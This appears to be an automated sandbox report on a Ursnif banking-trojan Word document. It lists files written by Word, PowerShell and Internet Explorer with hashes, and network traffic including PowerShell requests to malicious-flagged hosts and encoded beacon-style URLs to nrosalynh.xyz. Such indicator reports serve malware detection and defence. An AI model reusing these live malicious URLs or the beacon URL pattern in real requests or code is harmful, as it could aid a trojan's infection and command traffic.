SHA256: dbc5549cbb0cc4c3d03e99d189f2f53e75f7344a6526f0c14e7fab6ddddb2d46
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\common-web-v12[1].css
text
MD5: 7ca8f13fb0056207bf7d5d0de0af36c6
SHA256: 6b693da2d5d36ad9802021b92916580bd44160351573922324b47efbf7371154
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\local[1].css
text
MD5: f969a9af1d85cf4736b415c6d8fcbc38
SHA256: cc0aa6f69184ce75f3ab0c5049cd82da882ea261099e823d5677182cf789e88e
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\avast-software-dark[1].png
image
MD5: c786920302f3f9e0a7748d83ea08a419
SHA256: e4926bd1f8daa848f270dffd5cab67c83cc992c51f13bc5a56877b3185e6232b
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\error-page-3[1].css
text
MD5: e68e5046c5a565ffb7dada6f9ff6d8aa
SHA256: 79316061baef62f9bea60e9a9d06495d4a87d96f59609ad271ba48863d0b3c55
2828
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\C5j[1].htm
html
MD5: cd2e0e43980a00fb6a2742d3afd803b8
SHA256: bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{5FD5F305-A96B-11E9-9FBD-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2448
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF6C7B6060EFCC8FB9.TMP
––
MD5:  ––
SHA256:  ––
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
xml
MD5: af8cee8f6c59a62c88e12e8d0cc304c4
SHA256: 96bfac0566038759c2513e586e0e8a938f6ca2ce0b844d765bb453e64feb9b39
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\urlblockindex[1].bin
binary
MD5: fa518e3dfae8ca3a0e495460fd60c791
SHA256: 775853600060162c4b4e5f883f9fd5a278e61c471b3ee1826396b6d129499aa7
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\iecompatviewlist[1].xml
xml
MD5: af8cee8f6c59a62c88e12e8d0cc304c4
SHA256: 96bfac0566038759c2513e586e0e8a938f6ca2ce0b844d765bb453e64feb9b39
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{5FD5F307-A96B-11E9-9FBD-5254004AAD21}.dat
binary
MD5: 52cba305771d57ddfb41837a8f560f98
SHA256: 327ba7fd90d87900b4f019ddc9d449c6c08de3a3b6bce3ad0967ffeb937da7e0
2448
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFB3471C64BFBA7458.TMP
––
MD5:  ––
SHA256:  ––
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[1].ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
2448
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
2448
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico
––
MD5:  ––
SHA256:  ––
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\MWFMDL2[1].woff
woff
MD5: 5ed659cf5fc777935283bbc8ae7cc19a
SHA256: 31b8037945123706cb78d80d4d762695df8c0755e9f7412e9961953b375708ae
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\mwfmdl2-v3.07[1].woff
woff
MD5: dae68c4a8aac30a0c75731aa3c7553f3
SHA256: 7f31cbb16dd8190854789bd1b43f15ae60940fb79afbb7cfbef664e12f8a247c
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\MWFMDL2[1].ttf
ttf
MD5: 5410c5517f1bbeb51e2d0f43bc6b4309
SHA256: 2f4e38662c0ff2fab3eb09dcb457cd0778501bffee4026f6b0d9364abb05db46
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\mwf-west-european-default.min[1].css
text
MD5: 12dd1e4d0485a80184b36d158018de81
SHA256: a04b5b8b345e79987621008e6cc9bef2b684663f9a820a0c7460e727a2a4ddc3
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\mscc-0.4.1.min[1].js
text
MD5: 5e9a1f4aa31d4aa60f6f899a2e45cef8
SHA256: c87516d7dd7077edd467f5b7b085b035cd4803ecf049670ab19de004e270aba8
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\RE1Mu3b[1].png
image
MD5: 9f14c20150a003d7ce4de57c298f0fba
SHA256: 112fec798b78aa02e102a724b5cb1990c0f909bc1d8b7b1fa256eab41bbc0960
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\mscc-0.4.1.min[1].css
text
MD5: d8c2b180c40bcc7ffcbe2c68b57d8fa2
SHA256: 35211f76c4c35c17f2649b96868c0d691f1d78b107f7635d22619948d0ee6880
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\jquery-1.9.1.min[1].js
text
MD5: 397754ba49e9e0cf4e7c190da78dda05
SHA256: c12f6098e641aaca96c60215800f18f5671039aecf812217fab3c0d152f6adb4
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\51-6d3a1e[1].css
text
MD5: 6178d19989d7964964a1cc7bed82f341
SHA256: 3abc05cf7fcd206115a9f2871547be6a8649c34b2efc0d1f77441147a5a78bc8
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\override[1].css
text
MD5: a570448f8e33150f5737b9a57b6d889a
SHA256: 0bd288d5397a69ead391875b422bf2cbdcc4f795d64aa2f780aff45768d78248
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\18-d72213[1].js
text
MD5: 59ad05cbcce6803fb00314310f20fc45
SHA256: 55afd02f9ca1fe1b8d3705ef8eba7c9a8e2f0ba4b8d1ab8853a2a10fae9e4ac8
2476
IEXPLORE.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\QDLRITMQ.txt
text
MD5: c481516cc832f5c8e9e5d5cc2a099b08
SHA256: c634e07f9902eca9d378ba35a2601fb2954cfaab340b3f07ae99e1d8eaa318bc
2080
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
binary
MD5: 2cabc4c3eb9fe9ab75f306db1561ac74
SHA256: ab992d2997fa21a8246d531c54453218ddaf4bf42e506269b8654a1e1c272089
2080
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFef2f7.TMP
binary
MD5: 2cabc4c3eb9fe9ab75f306db1561ac74
SHA256: ab992d2997fa21a8246d531c54453218ddaf4bf42e506269b8654a1e1c272089
2080
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\10TC1QCKJH45LIAHGHO0.temp
––
MD5:  ––
SHA256:  ––
2904
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
tlb
MD5: 0fbcb3b2e913918bdcefd5c412d29a7a
SHA256: 124a4380bfb50013f10c4c93c925aefddff27a537825ab3c1dfe870ea2d5d620
2904
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Ursnif_Usa.doc.LNK
lnk
MD5: 3c9d3c199e63414320fd5db165c9d570
SHA256: ef417ec3b3e0116e3ac7a0d8783f08f4e8d559d70370b8b306b74a37a6e44c61
2904
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 1e9bae7c596bc29580663e53abbd3bce
SHA256: b83bbfcd4917fff9faf299deef6d50b54fba50459489eb47ed84de6300ea29d0
2904
WINWORD.EXE
C:\Users\admin\Desktop\~$snif_Usa.doc
pgc
MD5: c458d3df6213eca154f206381a5f633c
SHA256: b7480bbfcb6f8c2936128c2d921ff1b543d4e530834c67bfba84d2fd644f28d5
2904
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRD378.tmp.cvr
––
MD5:  ––
SHA256:  ––
2940
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa2940.39322\Ursnif_Usa.doc
document
MD5: a3e1e2e62d1c512ef2a53958e11b2e48
SHA256: dc787e0dc5026fc1ce7a794c88f907f17b955d1690259df5c96ca8dd99cffa67
1924
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFA0B56ADC5BFD5DE8.TMP
––
MD5:  ––
SHA256:  ––

Find more information about the static content and download it in the full report

Network activity

HTTP(S) requests
69
TCP/UDP connections
67
DNS requests
38
Threats
12

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2080 powershell.exe GET 404 147.78.66.46:80 http://dx019xsl1pace.xyz/sywo/fgoow.php?l=styer1.gxl unknown
––
––
malicious
2080 powershell.exe GET –– 109.196.164.79:80 http://109.196.164.79/3.php unknown
––
––
suspicious
2080 powershell.exe GET –– 109.196.164.79:80 http://109.196.164.79/3.php unknown
––
––
suspicious
2476 IEXPLORE.EXE GET 404 2.21.41.70:443 https://www.microsoft.com/images/4v9PDHxp2bGz/CqZm5Cue9gp/prpBCTxEZbkMgo/F_2BIso8VGkD2KVHUrcb7/VTrLrlcnZie9ZiMe/xNrRHp2GqLcgDbh/xZHT_2BvvGHPqxppPt/4YJWqiRhJ/Kv7izJ5_2BAPjJ8XYLSt/cq0xfLvwXByzeXQ4JcP/I.avi FR
html
whitelisted
2476 IEXPLORE.EXE GET 301 40.113.200.201:80 http://microsoft.com/images/4v9PDHxp2bGz/CqZm5Cue9gp/prpBCTxEZbkMgo/F_2BIso8VGkD2KVHUrcb7/VTrLrlcnZie9ZiMe/xNrRHp2GqLcgDbh/xZHT_2BvvGHPqxppPt/4YJWqiRhJ/Kv7izJ5_2BAPjJ8XYLSt/cq0xfLvwXByzeXQ4JcP/I.avi US
––
––
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.32:443 https://statics-uhf-wus.akamaized.net/statics/override.css?c=7 unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.32:443 https://statics-uhf-wus.akamaized.net/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/7f-652c90/63-077520/a4-34de62/75-71ddfc/db-bc0148/dc-7e9864/78-4c7d22/9f-d154ca/e4-8302f6/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/32-6dafa3/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/18-d72213?ver=2.0&iife=1 unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.27:443 https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31 unknown
image
whitelisted
2476 IEXPLORE.EXE GET 200 2.16.186.32:443 https://statics-uhf-wus.akamaized.net/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/e9-4413b1/4e-bb306d/a9-963a11/10-aee09b/51-465167/1d-9730ee/34-521645/51-6d3a1e?ver=2.0 unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.18.233.62:443 https://c.s-microsoft.com/mscc/statics/mscc-0.4.1.min.css unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 152.199.19.160:443 https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js US
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.18.233.62:443 https://c.s-microsoft.com/mscc/statics/mscc-0.4.1.min.js unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.19.39.63:443 https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css unknown
text
whitelisted
2476 IEXPLORE.EXE GET 200 2.19.39.63:443 https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/fonts/MWFMDL2.ttf unknown
ttf
whitelisted
2476 IEXPLORE.EXE GET 200 2.21.41.70:443 https://www.microsoft.com/mwf/_h/v3.07/mwf.app/fonts/mwfmdl2-v3.07.woff FR
woff
whitelisted
2476 IEXPLORE.EXE GET 200 2.19.39.63:443 https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/fonts/MWFMDL2.woff unknown
woff
whitelisted
2476 IEXPLORE.EXE GET 204 2.18.232.244:443 https://uhf.microsoft.com/_log?o=mscc&s=Microsoft.OneRenderFramework.Core&m=show&nv=aspnet-3.1.3&sv=0.1.2 unknown
––
––
whitelisted
2448 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
2448 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
2448 iexplore.exe GET 200 152.199.19.161:443 https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml US
xml
whitelisted
2448 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblockindex.bin US
binary
whitelisted
2448 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin US
––
––
whitelisted
2448 iexplore.exe GET 304 152.199.19.161:443 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml US
––
––
whitelisted
2828 IEXPLORE.EXE GET 301 5.62.40.96:80 http://avast.com/images/XwESZsNY4Gk6WaVeonp/FaEKtuDMEUOAVncZoElyUg/mU5vD4UBW5RIM/M6hwqzoj/JOtpRom3aWw1vBxNmbCY82J/j8acWNZCGz/wMzfuFVWEVFo_2BkH/_2B71pxiWPEP/fZi63JkNCXx/PK1wJFwssWujstzW/C5j.avi DE
html
whitelisted
2828 IEXPLORE.EXE GET 404 104.108.46.190:443 https://www.avast.com/images/XwESZsNY4Gk6WaVeonp/FaEKtuDMEUOAVncZoElyUg/mU5vD4UBW5RIM/M6hwqzoj/JOtpRom3aWw1vBxNmbCY82J/j8acWNZCGz/wMzfuFVWEVFo_2BkH/_2B71pxiWPEP/fZi63JkNCXx/PK1wJFwssWujstzW/C5j.avi NL
html
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/c/mkt/error-page-3.css unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/c/local/en-ww/local.css unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/c/common-web-v12.css unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/avast-software-dark.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/ico/icon-search-32.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/j/jquery.js unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 216.58.210.8:443 https://www.googletagmanager.com/gtm.js?id=GTM-PZ48F8 US
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static.avast.com/client.js unknown
binary
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/700/proximanova-bold-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/300/proximanova-light-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/400/proximanova-regular-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/o/f/300/proximanova-lightit-webfont.eot? unknown
eot
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/j/avast.js unknown
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/error/it404.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 159.122.87.148:443 https://dev.visualwebsiteoptimizer.com/j.php?a=101094&u=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&r=0.7774996979181491 DE
text
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/avast-software-smaller-white.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/flags/flag-language-selector-sprite-v10.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/i-v12/icon-social.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/label/label-orange-l-l.svg unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/label/label-orange-l-r.svg unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 159.122.87.148:443 https://dev.visualwebsiteoptimizer.com/v.gif?a=101094&d=avast.com&u=DA75B93168C049E948157AA2E41341BC6&h=6f3afb4fd0e0ff017aeb9cf8c0fa8a46&t=false&r=0.685666491908622 DE
image
whitelisted
2828 IEXPLORE.EXE GET 200 147.75.83.123:443 https://static.hotjar.com/c/hotjar-470805.js?sv=5 US
text
whitelisted
2828 IEXPLORE.EXE GET 200 216.58.208.46:443 https://www.google-analytics.com/analytics.js US
text
whitelisted
2828 IEXPLORE.EXE GET 200 77.88.21.119:443 https://mc.yandex.ru/metrika/watch.js RU
text
whitelisted
2828 IEXPLORE.EXE GET 200 104.108.46.190:443 https://www.avast.com/api/v1/tooltip?locale=en-ww NL
xml
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/arrows/slide-top.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 147.75.32.75:443 https://script.hotjar.com/modules.cf35bc326ce7f74ad61b.js US
text
whitelisted
2828 IEXPLORE.EXE POST 200 172.217.16.142:443 https://ampcid.google.com/v1/publisher:getClientId?key=AIzaSyA65lEHUEizIsNtlbNo-l2K18dT680nsaM US
text
text
whitelisted
1440 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
1440 iexplore.exe GET 200 204.79.197.200:443 https://www.bing.com/favicon.ico US
image
whitelisted
2828 IEXPLORE.EXE POST 302 77.88.21.119:443 https://mc.yandex.ru/watch/34150835?wmode=7&page-url=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&charset=utf-8&browser-info=ti%3A10%3Aj%3A1%3Ans%3A1563461475627%3As%3A1280x720x24%3Ask%3A1%3Af%3A27.0.0.187%3Afpr%3A411595655001%3Acn%3A1%3Aw%3A776x521%3Ai%3A20190718145119%3Aet%3A1563461480%3Aen%3Autf-8%3Ac%3A1%3Ala%3Aen-us%3Awh%3A1%3Apv%3A1%3Als%3A931635438724%3Arqn%3A1%3Arn%3A24857546%3Ahid%3A711976697%3Ads%3A0%2C0%2C0%2C111%2C1%2C0%2C0%2C2631%2C0%2C%2C%2C%2C2632%3Agdpr%3A14%3Av%3A1609%3Arqnl%3A1%3Ast%3A1563461480%3Au%3A1563461480675499970%3At%3APage%20not%20found RU
––
––
whitelisted
2828 IEXPLORE.EXE GET 200 77.88.21.119:443 https://mc.yandex.ru/metrika/advert.gif RU
image
whitelisted
2828 IEXPLORE.EXE GET 200 77.88.21.119:443 https://mc.yandex.ru/watch/34150835/1?wmode=7&page-url=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&charset=utf-8&browser-info=ti%3A10%3Aj%3A1%3Ans%3A1563461475627%3As%3A1280x720x24%3Ask%3A1%3Af%3A27.0.0.187%3Afpr%3A411595655001%3Acn%3A1%3Aw%3A776x521%3Ai%3A20190718145119%3Aet%3A1563461480%3Aen%3Autf-8%3Ac%3A1%3Ala%3Aen-us%3Awh%3A1%3Apv%3A1%3Als%3A931635438724%3Arqn%3A1%3Arn%3A24857546%3Ahid%3A711976697%3Ads%3A0%2C0%2C0%2C111%2C1%2C0%2C0%2C2631%2C0%2C%2C%2C%2C2632%3Agdpr%3A14%3Av%3A1609%3Arqnl%3A1%3Ast%3A1563461480%3Au%3A1563461480675499970%3At%3APage%20not%20found RU
text
whitelisted
2828 IEXPLORE.EXE GET 200 147.75.83.123:443 https://vars.hotjar.com/box-90f3a29ef7448451db5af955688970d7.html US
html
whitelisted
2828 IEXPLORE.EXE POST 200 172.217.21.206:443 https://ampcid.google.ie/v1/publisher:getClientId?key=AIzaSyA65lEHUEizIsNtlbNo-l2K18dT680nsaM US
text
text
whitelisted
2828 IEXPLORE.EXE GET 200 216.58.208.46:443 https://www.google-analytics.com/gtm/js?id=GTM-58JT2DK&t=gtm16&cid=1235668083.1563461481&aip=true US
text
whitelisted
2828 IEXPLORE.EXE GET 200 104.108.59.193:443 https://t.av.st/api/rum/v1/?q=%7B%22domain%22%3A%22www.avast.com%22%2C%22pageId%22%3A%22C5j.avi%22%2C%22contentId%22%3A%22en-ww%20%7C%20error-page.php%22%2C%22locale%22%3A%22en-ww%22%2C%22browser%22%3A%7B%22name%22%3A%22InternetExplorer%22%2C%22ver%22%3A%2211.0%22%2C%22lang%22%3A%22en-us%22%7D%2C%22trackHit%22%3Atrue%2C%22performance%22%3A%7B%22unloadTime%22%3A0%2C%22redirectTime%22%3A0%2C%22domainLookupTime%22%3A0%2C%22connectTime%22%3A0%2C%22requestTime%22%3A0%2C%22responseTime%22%3A111%2C%22dom%22%3A%7B%22interactiveTime%22%3A2631%2C%22loadEventStartTime%22%3A0%2C%22contentLoadedEventTime%22%3A0%2C%22resourceLodedTime%22%3A2328%7D%2C%22domTime%22%3A4959%2C%22loadEventTime%22%3A43%2C%22fullTime%22%3A5003%7D%7D NL
image
unknown
2828 IEXPLORE.EXE GET 200 216.58.208.46:443 https://www.google-analytics.com/plugins/ua/ec.js US
text
whitelisted
2828 IEXPLORE.EXE GET 302 216.58.208.46:443 https://www.google-analytics.com/r/collect?v=1&_v=j77&aip=1&a=1769986088&t=pageview&_s=1&dl=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&dp=%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&ul=en-us&de=utf-8&dt=Page%20not%20found&sd=24-bit&sr=1280x720&vp=776x521&je=1&fl=27.0%20r0&_u=aGDAAUQKQAQC~&jid=1064074141&gjid=1950763104&cid=1235668083.1563461481&tid=UA-58120669-2&_gid=1714463231.1563461481&_r=1&gtm=2wg7a0PZ48F8&cd12=en-ww&cd14=en-ww%20%7C%20error-page.php&cd28=avast.com&cd29=1&cd34=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&cd41=1235668083.1563461481&cd42=N%2FA&cd44=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20rv%3A11.0)%20like%20Gecko&cd45=Coordinated%20Universal%20Time&cd46=Thu%20Jul%2018%202019%2014%3A51%3A21%20GMT%2B0000%20(Coordinated%20Universal%20Time)&cd47=14&cd74=61fa02ff9c7334be22cd63fe9fa9b72e&cd78=GTM-PZ48F8_329_false&cd99=999_a3g%20%7C%7C%20source%3D(direct)%7Cmedium%3D(none)%7Ccampaign%3D(not%20set)%7CsegmentCode%3Da&z=301848108 US
html
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/i-v11/icons-sprite-nav-orange.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/colorbox/colorbox-arrows-v9.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/clearbox-loading.gif unknown
image
whitelisted
2640 IEXPLORE.EXE GET 200 85.143.217.238:80 http://nrosalynh.xyz/images/M_2BvnIlP0d2U3elGCGbOEx/i5MXlIG2hL/zb2SWRrmQJzJLVCW_/2FrabLvp0fam/pDXEmtsS1lI/_2FdtQFJI_2BmJ/S0rvUwoZS7iadtheY2Kou/kwGUuQV_2B02r_2F/92dPPzOf7ngtNor/HswiDv9w1bj30/B9mJBXtf8/H.avi RU
––
––
malicious
1924 iexplore.exe GET 200 85.143.217.238:80 http://nrosalynh.xyz/favicon.ico RU
image
malicious

Connections

PID Process IP ASN CN Reputation
2080 powershell.exe 147.78.66.46:80 –– suspicious
2080 powershell.exe 109.196.164.79:80 –– suspicious
2476 IEXPLORE.EXE 40.113.200.201:80 Microsoft Corporation US malicious
2476 IEXPLORE.EXE 2.21.41.70:443 GTT Communications Inc. FR suspicious
2476 IEXPLORE.EXE 2.16.186.32:443 Akamai International B.V. –– whitelisted
2476 IEXPLORE.EXE 152.199.19.160:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2476 IEXPLORE.EXE 2.19.39.63:443 Akamai International B.V. –– unknown
2476 IEXPLORE.EXE 2.18.233.62:443 Akamai International B.V. –– whitelisted
2476 IEXPLORE.EXE 2.16.186.27:443 Akamai International B.V. –– whitelisted
2448 iexplore.exe 204.79.197.200:443 Microsoft Corporation US whitelisted
2476 IEXPLORE.EXE 2.18.232.244:443 Akamai International B.V. –– unknown
2448 iexplore.exe 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2828 IEXPLORE.EXE 5.62.40.96:80 AVAST Software s.r.o. DE malicious
